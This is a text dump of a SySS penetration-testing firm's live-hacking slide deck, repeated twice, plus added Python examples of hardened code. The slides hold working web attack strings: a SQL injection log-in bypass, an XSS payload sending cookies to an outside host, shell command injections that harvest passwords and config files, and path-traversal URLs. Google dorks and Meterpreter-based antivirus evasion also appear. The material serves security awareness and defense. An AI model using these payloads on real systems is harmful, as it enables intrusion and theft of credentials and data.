Page 1 SySS GmbH 14/06/16
LIVE HACKING
AGENDA
1. DOS attack against an internet web server
2. Deactivating burglar alarm
3. Attacking wireless keyboards
4. Mobile App and Web Service
5. SMS spoofing and identity theft
6. Attacks against crypto usb sticks
7. Smartphone trojan / SIM bug
8. Hardware hacker tools
If time
1. USB attacks
2. Evading antivirus
3. SQL Injection
ABOUT THE SPEAKER
Dipl.-Inform.
Sebastian Schreiber
Managing Director of SySS GmbH
+49 (0)7071 - 40 78 56-0
sebastian.schreiber@syss.de
ABOUT SYSS GMBH
Founded in 1998
At present: about 80 employees
Based in Tübingen, southwest Germany
Operating worldwide, focusing on Germany
Rapidly growing: new campus providing space for 280 "Pentest Experts" is under construction
Services
Penetration Testing & Security Analyses (95%)
Incident Response/ Training/ Live Hacking Presentations (5%)
SELECTED INCIDENTS 2015
04/2015: "Russian Hackers Read Obama's Unclassified Emails" – nytimes.com
05/2015: "IT Incident Deutscher Bundestag" – tagesschau.de
07/2015: "Hackers remotely take over a Jeep Cherokee" – heise.de
07/2015: "Hackers can disable a sniper rifle – or change its target" – wired.de
07/2015: "Surveillance software: Hacking Team becoming Hacked Team" – heise.de
08/2015: "Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords" – golem.de
09/2015: "Cyber crime: Robbing fingerprints of more than five million US government employees" – wired.de
10/2015: "USA: Hacker stealing data about millions of T-Mobile customers" – Spiegel.de
10/2015: "Online banking: New ways of attacking German mTAN" – heise.de
GOOGLE HACKING
Filetype:sql phpmyadmin wp_users
inurl:warenkorb inurl:preis
LIVE-HACK HOTEL
peter/peter
http://www.live-hack.de/xss/xss.php
Admin / passwort
SQL INJECTION IN LOG-IN FORMS
SELECT * FROM users WHERE user='peter' AND password='peter'
peter' OR 1=1#
http://www.live-hack.de/xss/xss.php
SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter'
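Added example (not part of the SySS slides): the log-in query above built by string concatenation, next to a parameterized form that treats the same input as data. The table layout, the second account, the hashing columns and all function names are assumptions; SQLite stands in for the demo database, so MySQL's '#' comment is emulated.

```python
import hashlib
import hmac
import os
import sqlite3


def kdf(password, salt):
    # Salted, slow password hash; the parameters are illustrative.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    # Constructed sample data. peter/peter is the demo login shown on the slides;
    # the table layout and the second account are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user TEXT PRIMARY KEY, password TEXT, salt BLOB, pw_hash BLOB)"
    )
    for name, pw in (("peter", "peter"), ("admin", "constructed-secret")):
        salt = os.urandom(16)
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?)", (name, pw, salt, kdf(pw, salt)))
    return db


def build_query_vulnerable(user, password):
    # Before: input is pasted into the SQL text, so a quote in it ends the string literal.
    return "SELECT * FROM users WHERE user='" + user + "' AND password='" + password + "'"


def login_vulnerable(db, user, password):
    query = build_query_vulnerable(user, password)
    # In MySQL '#' starts a comment. SQLite has no '#' comment, so this demo
    # emulates MySQL's view of the statement by cutting it at the first '#'.
    effective = query.split("#", 1)[0]
    return len(db.execute(effective).fetchall()) > 0


# Used when the user does not exist, so both paths do the same amount of work.
DUMMY_SALT = b"\x00" * 16
DUMMY_HASH = kdf("", DUMMY_SALT)


def login_hardened(db, user, password):
    # After: the statement text is constant and the driver binds the value,
    # so quotes and '#' in the input never reach the SQL parser as syntax.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE user = ?", (user,)).fetchone()
    salt, expected = row if row else (DUMMY_SALT, DUMMY_HASH)
    ok = hmac.compare_digest(kdf(password, salt), expected)
    return ok and row is not None


if __name__ == "__main__":
    db = make_db()
    slide_input = "peter' OR 1=1#"
    print(build_query_vulnerable(slide_input, "peter"))
    print("vulnerable accepts slide input:", login_vulnerable(db, slide_input, "x"))
    print("hardened accepts slide input:  ", login_hardened(db, slide_input, "x"))
    print("hardened accepts peter/peter:  ", login_hardened(db, "peter", "peter"))
```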
DENIAL OF SERVICE (DOS)
http://www.live-hack.de/clock.php
Attack: /home/livehack/thc/run.sh
iPHONE/iPAD HACKS
ANTIVIRUS EVASION (1/2)
How antivirus software works
Blacklisting
Whitelisting
Blacklisting: How it works and its weak points
Signature based:
Searching for known patterns
Unknown
ANTIVIRUS EVASION (2/2)
Blacklisting: How it works and its weak points
Signature-based:
Searching for known patterns
Unknown malware will not be detected
Polymorphic malware has already been used for a long time to outsmart signature-based detection
Behavior-based:
Software is classified as harmless or harmful according to its behavior
In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures)
Static code analysis: It is only possible to check code directly accessible within an executable file
Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.)
ANTIVIRUS EVASION: LIVE DEMONSTRATION
Example for antivirus software: Microsoft Security Essentials
Free-of-charge malware protection for end-users and small business
Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection)
Using the following antivirus evasion methods:
Polymorphism
Encryption + compression
Detection of sandbox environments
Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework
Creating an executable file containing known malware using the software "ShCoLo" by SySS GmbH
ANTIVIRUS EVASION: TEST RESULTS
Product | Version | Date of virus definition file | Operating system(s) of target systems
Avira AntiVir Professional | 10.2.0.1064 | 21.05.2013 | Windows XP SP 3 (32 Bit), Windows 7 SP 1 (64 Bit)
AVG Free | 2013.0.2904 | 20.05.2013 | Windows XP SP 3 (32 Bit)
Kaspersky Endpoint Protection Workstation | 8.1.0.831 | 21.05.2013 | Windows XP SP 3 (32 Bit)
McAfee SaaS Endpoint Protection | 5400.1158 | 20.05.2013 | Windows 7 SP 1 (64 Bit)
Microsoft Security Essentials | 4.1.522.0 | 21.05.2013 | Windows XP SP 3 (32 Bit)
Sophos Endpoint Security and Control | 10.2 | 21.05.2013 | Windows XP SP 3 (32 Bit)
Symantec Endpoint Protection | 12.1.1101.401 | 27.05.2013 | Windows 7 SP 1 (64 Bit)
MOBILE PHONE TROJAN
Symbian phone:
0049-177-6397937
SMS forwarding
Activate the microphone
Reboot
Location info
FIPS 140-2 CERTIFIED CRYPTO USB STICKS (1/2)
FIPS 140-2 CERTIFIED CRYPTO USB STICKS (2/2)
ACTIONABLE TAKEAWAYS
Be aware of digital attacks 24/7
Try to think like a hacker when applying IT safety measures
Perform security assessments like penetration tests
Stay alert and retest your IT security on a regular basis
Remember: The next vulnerability could just be found while attending this session
XSS
<script>window.open('http://www.syss.de/cookie.html?'+document.cookie)</script>
INJECTIONS, PHP MAGIC QUOTES
http://livehack.syss.de/infoboard/index.php?mod=search
Search for, e.g., “SySS”
Search for !"§$%&/()=?`‘‚
Conclusion: PHP Magic Quotes
Search for SySS $(sleep 4)
$(grep -r -i password * > /tmp/passwd)
http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/passwd
Search for $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt)
http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/userdata.txt
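Added example (not SySS code): a hardened counterpart to the two flaws this slide demonstrates, a search term reaching a shell and a "mod" parameter reaching the file system. It assumes the search shells out to grep and that "mod" names a .php file in one directory; search_board, resolve_mod and the sample files are hypothetical.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Assumed naming scheme for modules: lower-case letters, digits, underscore.
MOD_NAME = re.compile(r"[a-z0-9_]+")


def resolve_mod(base_dir, mod):
    """Map the 'mod' request parameter to a file inside base_dir, or raise ValueError."""
    if not MOD_NAME.fullmatch(mod):
        raise ValueError("invalid module name")
    base = Path(base_dir).resolve()
    target = (base / (mod + ".php")).resolve()
    # Second line of defence: the resolved path (symlinks included) must stay below base.
    if base not in target.parents:
        raise ValueError("module outside base directory")
    return target


def mod_allowed(base_dir, mod):
    try:
        resolve_mod(base_dir, mod)
        return True
    except ValueError:
        return False


def search_board(term, directory):
    """Return the sorted names of files under directory that contain term (case-insensitive)."""
    # argv list and no shell: "$(...)" in the term is never expanded.
    # -F: the term is a fixed string, not a regex.
    # -e: a term starting with '-' cannot be read as an option.
    proc = subprocess.run(
        ["grep", "-r", "-i", "-l", "-F", "-e", term, "--", str(directory)],
        capture_output=True, text=True, timeout=10, check=False,
    )
    if proc.returncode not in (0, 1):  # 1 means "no match"; anything else is an error
        raise RuntimeError(proc.stderr.strip())
    return sorted(Path(p).name for p in proc.stdout.splitlines())


def demo():
    # Constructed sample board; the search terms and mod values are the ones on the slide.
    with tempfile.TemporaryDirectory() as tmp:
        board = Path(tmp)
        (board / "welcome.txt").write_text("Posted by SySS\n")
        (board / "literal.txt").write_text("SySS $(sleep 4)\n")
        (board / "search.php").write_text("<?php /* constructed module */ ?>\n")
        return {
            "plain": search_board("SySS", board),
            # Matched as literal text, so only the file containing that text is returned.
            "substitution": search_board("SySS $(sleep 4)", board),
            "mod_ok": resolve_mod(board, "search").name,
            "mod_traversal": mod_allowed(board, "../../../tmp/passwd"),
            "mod_slide_url": mod_allowed(board, "/infoboard/index.php?mod=../../../tmp/passwd"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```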
QUIZDUELL
Opponent: lhtest2
Thank you very much for your attention!
SySS – The Pentest Experts
Sebastian Schreiber, Managing Director
sebastian.schreiber@syss.de

How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Live Hacking Agenda and Techniques

  • 2. AGENDA
      1. DOS attack against an internet web server
      2. Deactivating burglar alarm
      3. Attacking wireless keyboards
      4. Mobile App and Web Service
      5. SMS spoofing and identity theft
      6. Attacks against crypto usb sticks
      7. Smartphone trojan / SIM bug
      8. Hardware hacker tools
      If time:
      1. USB attacks
      2. Evading antivirus
      3. SQL Injection
  • 3. ABOUT THE SPEAKER
      Dipl.-Inform. Sebastian Schreiber
      Managing Director of SySS GmbH
      +49 (0)7071 - 40 78 56-0
      sebastian.schreiber@syss.de
  • 4. ABOUT SYSS GMBH
      Founded in 1998
      At present: about 80 employees
      Based in Tübingen, southwest Germany
      Operating worldwide, focusing on Germany
      Rapidly growing: new campus providing space for 280 „Pentest Experts“ is under construction
      Services:
        Penetration Testing & Security Analyses (95%)
        Incident Response / Training / Live Hacking Presentations (5%)
  • 5. SELECTED INCIDENTS 2015
      04/2015: „Russian Hackers Read Obama's Unclassified Emails“ – nytimes.com
      05/2015: „IT Incident Deutscher Bundestag“ – tagesschau.de
      07/2015: „Hackers remotely take over a Jeep Cherokee“ – heise.de
      07/2015: „Hackers can disable a sniper rifle – or change its target“ – wired.de
      07/2015: „Surveillance software: Hacking Team becoming Hacked Team“ – heise.de
      08/2015: „Ashley Madison Dating Portal: Hacker stealing 11,2 Mio. passwords“ – golem.de
      09/2015: „Cyber crime: Robbing fingerprints of more than five million US government employees“ – wired.de
      10/2015: „USA: Hacker stealing data about millions of T-Mobile customers“ – Spiegel.de
      10/2015: „Online banking: New ways of attacking German mTAN“ – heise.de
  • 6. GOOGLE HACKING
      Filetype:sql phpmyadmin wp_users
      inurl:warenkorb inurl:preis
  • 7. LIVE-HACK HOTEL
      peter/peter
      http://www.live-hack.de/xss/xss.php
      Admin / passwort
  • 8. SQL INJECTION IN LOG-IN FORMS
      SELECT * FROM users WHERE user='peter' AND password='peter'
      peter' OR 1=1#
      http://www.live-hack.de/xss/xss.php
      SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter'
  • 9. DENIAL OF SERVICE (DOS)
      http://www.live-hack.de/clock.php
      Attack: /home/livehack/thc/run.sh
  • 11. ANTIVIRUS EVASION (1/2)
      How antivirus software works
        Blacklisting
        Whitelisting
      Blacklisting: How it works and its weak points
        Signature based: Searching for known patterns
          Unknown
  • 12. ANTIVIRUS EVASION (2/2)
      Blacklisting: How it works and its weak points
        Signature-based: Searching for known patterns
          Unknown malware will not be detected
          Polymorphic malware has already been used for a long time to outsmart signature-based detection
        Behavior-based: Software is classified as harmless or harmful according to its behavior
          In general, rule-based technologies in combination with scoring procedures and fixed thresholds concerning calculated scores (heuristic procedures)
          Static code analysis: It is only possible to check code directly accessible within an executable file
          Dynamic code analysis during runtime (sandbox environment): Various limitations given by the sandbox environment (e.g., period of time, specific user actions like mouse clicks etc.)
  • 13. ANTIVIRUS EVASION: LIVE DEMONSTRATION
      Example for antivirus software: Microsoft Security Essentials
        Free-of-charge malware protection for end-users and small business
        Uses the same technology and scan engine as System Center 2012 Endpoint Protection (formerly Forefront Endpoint Protection)
      Using the following antivirus evasion methods:
        Polymorphism
        Encryption + compression
        Detection of sandbox environments
      Malware: Meterpreter Shell (windows/meterpreter/reverse_https) of Metasploit Framework
      Creating an executable file containing known malware using the software “ShCoLo” by SySS GmbH
  • 14. ANTIVIRUS EVASION: TEST RESULTS

      | Product | Version | Date of virus definition file | Operating system(s) of target systems |
      |---|---|---|---|
      | Avira AntiVir Professional | 10.2.0.1064 | 21.05.2013 | Windows XP SP 3 (32 Bit), Windows 7 SP 1 (64 Bit) |
      | AVG Free | 2013.0.2904 | 20.05.2013 | Windows XP SP 3 (32 Bit) |
      | Kaspersky Endpoint Protection Workstation | 8.1.0.831 | 21.05.2013 | Windows XP SP 3 (32 Bit) |
      | McAfee SaaS Endpoint Protection | 5400.1158 | 20.05.2013 | Windows 7 SP 1 (64 Bit) |
      | Microsoft Security Essentials | 4.1.522.0 | 21.05.2013 | Windows XP SP 3 (32 Bit) |
      | Sophos Endpoint Security and Control | 10.2 | 21.05.2013 | Windows XP SP 3 (32 Bit) |
      | Symantec Endpoint Protection | 12.1.1101.401 | 27.05.2013 | Windows 7 SP 1 (64 Bit) |

  • 15. MOBILE PHONE TROJAN
      Symbian phone: 0049-177-6397937
      SMS forwarding
      Activate the microphone
      Reboot
      Location info
  • 16. FIPS 140-2 CERTIFIED CRYPTO USB STICKS (1/2)
  • 17. FIPS 140-2 CERTIFIED CRYPTO USB STICKS (2/2)
  • 18. ACTIONABLE TAKEAWAYS
      Be aware of digital attacks 24/7
      Try to think like a hacker when applying IT safety measures
      Perform security assessments like penetration tests
      Stay alert and retest your IT security on a regular basis
      Remember: The next vulnerability could just be found while attending this session
  • 20. INJECTIONS, PHP MAGIC QUOTES
      http://livehack.syss.de/infoboard/index.php?mod=search
      Search for, e.g., “SySS”
      Search for !"§$%&/()=?`‘‚
      Conclusion: PHP Magic Quotes
      Search for SySS $(sleep 4)
      $(grep -r -i password * > /tmp/passwd)
      http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/passwd
      Search for $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt)
      http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../. ./../tmp/userdata.txt
  • 22. Thank you very much for your attention!
      SySS – The Pentest Experts
      Sebastian Schreiber, Managing Director
      sebastian.schreiber@syss.de
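
Slide 8's log-in query, as an added example that is not part of the original slides: the string-built query next to a parameterized one. The table layout, the function names and the SQLite form of the input (`--` in place of MySQL's `#` comment marker) are assumptions made so the block runs offline.

```python
import sqlite3

def make_db():
    """In-memory users table with one constructed account (peter/peter, as on the slide)."""
    db = sqlite3.connect(":memory:")
    # Plain-text password column mirrors the slide's query; a real table stores a hash.
    db.execute("CREATE TABLE users (user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('peter', 'peter')")
    return db

def build_query_unsafe(user, password):
    # Vulnerable pattern from the slide: user input is pasted into the SQL text.
    return f"SELECT * FROM users WHERE user='{user}' AND password='{password}'"

def login_unsafe(db, user, password):
    return db.execute(build_query_unsafe(user, password)).fetchone() is not None

def login_safe(db, user, password):
    # Hardened form: placeholders keep the input as data, never as SQL syntax.
    row = db.execute(
        "SELECT 1 FROM users WHERE user = ? AND password = ?", (user, password)
    ).fetchone()
    return row is not None

SLIDE_INPUT = "peter' OR 1=1#"     # from the slide; '#' starts a comment in MySQL
SQLITE_INPUT = "peter' OR 1=1-- "  # assumption: same input with SQLite's comment marker

if __name__ == "__main__":
    db = make_db()
    # Reproduces the second query shown on the slide.
    print(build_query_unsafe(SLIDE_INPUT, "peter"))
    # The password check is commented out of the string-built query.
    print("unsafe, wrong password:", login_unsafe(db, SQLITE_INPUT, "wrong"))
    # With bound parameters the same input is just an unknown user name.
    print("safe,   wrong password:", login_safe(db, SQLITE_INPUT, "wrong"))
    print("safe,   real login:    ", login_safe(db, "peter", "peter"))
```
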
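
Slide 20's finding, as an added example (not SySS code): quote escaping in the style of Magic Quotes leaves `$(...)` intact when the search term reaches a shell, while passing the term as a single argument does not. The grep-based search, the function names and the module file names are assumptions; `$(echo SySS)` is a harmless constructed probe standing in for the slide's `$(sleep 4)`.

```python
import os
import subprocess
import tempfile

def magic_quotes(s):
    # Backslash-escape \, ' and " as PHP Magic Quotes did (NUL handling omitted).
    for ch in ("\\", "'", '"'):
        s = s.replace(ch, "\\" + ch)
    return s

def search_unsafe(term, root):
    # Assumed server-side pattern: escaped term interpolated into a shell command line.
    cmd = f'grep -r -i -l "{magic_quotes(term)}" .'
    out = subprocess.run(cmd, shell=True, cwd=root, capture_output=True, text=True)
    return sorted(out.stdout.split())

def search_safe(term, root):
    # No shell involved: the term is one argv entry, -F matches it literally,
    # and -- stops a leading '-' from being parsed as an option.
    out = subprocess.run(["grep", "-r", "-i", "-l", "-F", "--", term, "."],
                         cwd=root, capture_output=True, text=True)
    return sorted(out.stdout.split())

# Hypothetical module map: ?mod= selects a fixed file instead of naming a path,
# so values such as ../../../tmp/passwd resolve to nothing.
ALLOWED_MODS = {"search": "mods/search.php", "news": "mods/news.php"}

def resolve_mod(mod):
    return ALLOWED_MODS.get(mod)

def demo():
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "page.txt"), "w") as f:
            f.write("SySS infoboard entry\n")  # constructed sample data
        probe = "$(echo SySS)"  # constructed probe: expands only if a shell sees it
        return (search_unsafe(probe, root),   # shell ran echo, grep matched "SySS"
                search_safe(probe, root),     # literal "$(echo SySS)" is not in the file
                search_safe("syss", root))    # ordinary searches still work

if __name__ == "__main__":
    print(demo())
    print(resolve_mod("search"), resolve_mod("../../../tmp/passwd"))
```
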